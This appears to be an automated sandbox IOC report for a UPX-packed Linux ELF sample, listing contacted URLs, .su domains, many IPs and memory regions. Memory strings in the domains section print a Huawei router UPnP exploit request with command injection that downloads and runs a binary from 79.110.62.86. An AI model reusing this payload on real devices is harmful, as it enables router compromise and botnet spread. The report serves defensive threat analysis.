Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

/tmp/GZBCPDzO6n.elf

URLs

Name

Malicious

http://79.110.62.86/srep.mips;

unknown

Details

Name:	http://79.110.62.86/srep.mips;
TargetID:	21552
From Memory:	true
Source:	GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp

Signature Hits	Behavior Group	Mitre Attack
Performs DNS queries with encoded ASCII data (may be used to data exfiltration)	Networking	Exfiltration Over Alternative Protocol Data Encoding
Queries the IP of a very long domain name	Networking	Application Layer Protocol
HTTP GET or POST without a user agent	Networking
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

http://upx.sf.net

unknown

Details

Name:	http://upx.sf.net
TargetID:	16
From Memory:	true
Current Path:	/tmp/GZBCPDzO6n.elf
Source:	GZBCPDzO6n.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Sample is packed with UPX	Data Obfuscation	Obfuscated Files or Information
URLs found in memory or binary data	Networking

http://schemas.xmlsoap.org/soap/encoding/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/encoding/
TargetID:	21552
From Memory:	true
Source:	GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS queries with encoded ASCII data (may be used to data exfiltration)	Networking	Exfiltration Over Alternative Protocol Data Encoding
Queries the IP of a very long domain name	Networking	Application Layer Protocol
HTTP GET or POST without a user agent	Networking
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

http://schemas.xmlsoap.org/soap/envelope/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/envelope/
TargetID:	21552
From Memory:	true
Source:	GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS queries with encoded ASCII data (may be used to data exfiltration)	Networking	Exfiltration Over Alternative Protocol Data Encoding
Queries the IP of a very long domain name	Networking	Application Layer Protocol
HTTP GET or POST without a user agent	Networking
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

Domains

Name

Malicious

secure-core-rebirthltd.su.& f#66a/PV!E((@@o

unknown

secure-core-rebirthltd.su.% f66a/PV!E(C1.=5Jj% fVVP.!a/EH:6@@F=54msecure-core-rebirthltdsu-% .<<PV!a/E(,@-!m._-!P[% f<<PV!a/.(7@3m._3P[3F% fI<<PV!

unknown

rebirth-network.su.J f,\FFa/PV!E8E(k[8;m._8;J fz66

unknown

secure-core-rebirthltd.su.% f<<PV!a/E(,@

unknown

rebirth-network.su.@ f`ZZPV!a/EL@@jn_3Dlg>P3yPOST /ctrlt/DeviceUpgrade_1 H.TP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Dig.st username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri=".ctrlt/DeviceUpgrade_1", response="3612f843a42db.8f48f59d2a3597e19c", algorithm="MD5", qop="auth", n.=00000001, cnonce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.x.lsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmln.:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mip.; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDown.oadURL></u:Upgrade></s:Body></s:Envelope>@ fTZZPV!a/ELC/@@tsL_/yPP.POST /ctrlt/DeviceU.grade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf.config", realm="HuaweiHomeGateway", nonce="88.45cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgr.de_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cno.ce="248d1a2560100669"<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/".s:encodingStyle="http://schemas..mlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(.bin/busybox wget http://79.110.62.86/srep.mips;./bin/busybox chmod 777 * srep.mi.s; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s.Envelope>@ f<<PV!a/E(@@v.m._

unknown

sex.secure-cyber-security-rebirthltd.su

unknown

secure-core-rebirthltd.su.% f?66a/PV!E(/2.=5aM% fAVVP.!a/EH:.@@F=J54secure-core-rebirthltdsu-% .66a/PV!E(C1/=5Jj% fVVPV!a/EH:6.@F=54msecure-core-rebirthltdsu-.%

unknown

rebirth-network.su.E fe66a/PV!EH(@q-/_m./PE fe66a/PV!

unknown

secure-core-rebirthltd.su.% f>66a/PV!E(@7

unknown

rebirth-network.su.6 f66a/PV!E((@.y_m.zP6 fRRa/PV!

unknown

rebirth-network.su.; fkRRa/PV!ED:LJ0E(9R8z'?'m._'?'P[;

unknown

There are 1 hidden domains, click here to show them.

IPs

Domain

Country

Malicious

156.171.22.88

unknown

Egypt

197.32.217.143

unknown

Egypt

156.82.62.169

unknown

United States

156.206.4.161

unknown

Egypt

197.179.230.34

unknown

Kenya

197.131.5.121

unknown

Morocco

156.72.176.95

unknown

United States

156.242.218.25

unknown

Seychelles

197.254.107.59

unknown

Kenya

197.113.54.107

unknown

Algeria

156.99.254.154

unknown

United States

197.232.116.137

unknown

Kenya

197.89.135.80

unknown

South Africa

197.0.117.131

unknown

Tunisia

156.211.246.177

unknown

Egypt

197.4.200.42

unknown

Tunisia

197.254.119.43

unknown

Kenya

156.144.159.197

unknown

United States

197.66.218.21

unknown

South Africa

156.216.55.92

unknown

Egypt

197.39.165.47

unknown

Egypt

156.83.88.191

unknown

Netherlands

156.80.56.38

unknown

United States

197.2.84.161

unknown

Tunisia

156.152.174.186

unknown

United States

197.220.166.138

unknown

Ghana

197.253.0.244

unknown

Nigeria

197.15.157.5

unknown

Tunisia

197.222.170.122

unknown

Egypt

197.109.158.34

unknown

South Africa

197.167.221.0

unknown

Egypt

197.82.136.104

unknown

South Africa

197.234.120.183

unknown

Namibia

156.118.124.12

unknown

France

197.221.180.230

unknown

South Africa

156.183.29.37

unknown

Egypt

197.233.253.24

unknown

Namibia

156.85.239.77

unknown

United States

156.183.30.30

unknown

Egypt

156.144.112.191

unknown

United States

197.92.3.145

unknown

South Africa

156.93.220.209

unknown

United States

197.87.110.17

unknown

South Africa

197.245.8.138

unknown

South Africa

156.158.248.199

unknown

Tanzania United Republic of

156.96.98.143

unknown

United States

197.227.254.233

unknown

Mauritius

197.222.170.117

unknown

Egypt

197.191.9.230

unknown

Ghana

156.94.122.167

unknown

United States

156.30.114.141

unknown

United States

197.179.30.0

unknown

Kenya

156.200.26.127

unknown

Egypt

156.197.222.99

unknown

Egypt

156.56.112.74

unknown

United States

156.199.163.152

unknown

Egypt

197.233.253.13

unknown

Namibia

197.159.165.42

unknown

Sao Tome and Principe

197.193.219.72

unknown

Egypt

156.184.158.81

unknown

Egypt

156.7.85.67

unknown

United States

156.175.119.35

unknown

Egypt

156.228.75.59

unknown

Seychelles

197.17.197.217

unknown

Tunisia

156.55.76.80

unknown

United States

156.38.69.221

unknown

Togo

197.152.240.73

unknown

Tanzania United Republic of

197.171.35.143

unknown

South Africa

156.122.75.60

unknown

United States

156.10.102.128

unknown

Finland

197.220.177.18

unknown

Ghana

156.173.241.2

unknown

Egypt

156.20.8.13

unknown

United States

197.204.9.234

unknown

Algeria

156.20.8.19

unknown

United States

156.104.234.98

unknown

United States

156.5.232.94

unknown

United States

156.86.107.168

unknown

United States

156.118.136.51

unknown

France

156.157.24.235

unknown

Tanzania United Republic of

197.212.239.106

unknown

Zambia

197.135.63.168

unknown

Egypt

156.97.29.244

unknown

Chile

197.55.34.213

unknown

Egypt

156.49.160.44

unknown

Sweden

197.18.187.123

unknown

Tunisia

197.70.60.121

unknown

South Africa

156.33.207.26

unknown

United States

156.145.226.15

unknown

United States

197.24.198.109

unknown

Tunisia

156.68.15.208

unknown

United States

156.58.240.209

unknown

Austria

156.93.132.214

unknown

United States

197.45.105.108

unknown

Egypt

197.248.91.254

unknown

Kenya

197.236.72.121

unknown

South Africa

197.194.23.193

unknown

Egypt

156.49.159.69

unknown

Sweden

197.205.103.242

unknown

Algeria

197.246.117.185

unknown

Egypt

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7f71e0033000

page execute read

5598a2371000

page read and write

5598a438f000

page read and write

5598a4378000

page execute and read and write

5598a237a000

page read and write

7f72e0021000

page read and write

7f72e80c0000

page read and write

7f72e7d4f000

page read and write

7f72e83ee000

page read and write

7f72e7782000

page read and write

7f71e0049000

page read and write

5598a4f14000

page read and write

7f72e83ca000

page read and write

7ffcc31e0000

page read and write

5598a2120000

page execute read

7f72e7ae4000

page read and write

7f72e82a1000

page read and write

7f72e7d72000

page read and write

7f72e76f0000

page read and write

7f72e8433000

page read and write

7f72e6ee8000

page read and write

7f72dffff000

page read and write

7f72e7ede000

page read and write

7ffcc31ec000

page execute read

There are 14 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
GZBCPDzO6n.elf

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportGZBCPDzO6n.elf

Processes

URLs

Domains

IPs

Memdumps

IOC Report
GZBCPDzO6n.elf